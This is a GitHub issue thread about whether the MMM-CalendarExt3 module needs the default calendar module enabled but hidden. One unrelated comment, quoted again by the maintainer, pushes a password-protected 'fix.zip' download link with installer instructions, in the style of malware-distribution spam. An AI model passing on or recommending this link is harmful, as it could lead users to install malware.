### ISSUE TITLE
I'm just hopping over from Ext2 to Ext3 and I wonder if I really need to have the default calendar in the code but invisible or if it's okay to have it installed.

### ISSUE THREAD

**Issue by eouia** [MMRIZE/MMM-CalendarExt3#161]
I'm just hopping over from Ext2 to Ext3 and I wonder if I really need to have the default calendar in the code but invisible or if it's okay to have it installed.

_Originally posted by @pst-mng in https://github.com/MMRIZE/MMM-CalendarExt3/discussions/104#discussioncomment-10440409_

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by eouia** [comment]
@pst-mng You need at least one calendar provider (the default calendar or MMM-GoogleCalendar or alternative one), That module should be executed on the MM, but you can hide it.

**Comment by eouia** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

???

**Comment by pst-mng** [comment]
Thanks a lot. That helped me to fetch the dates!
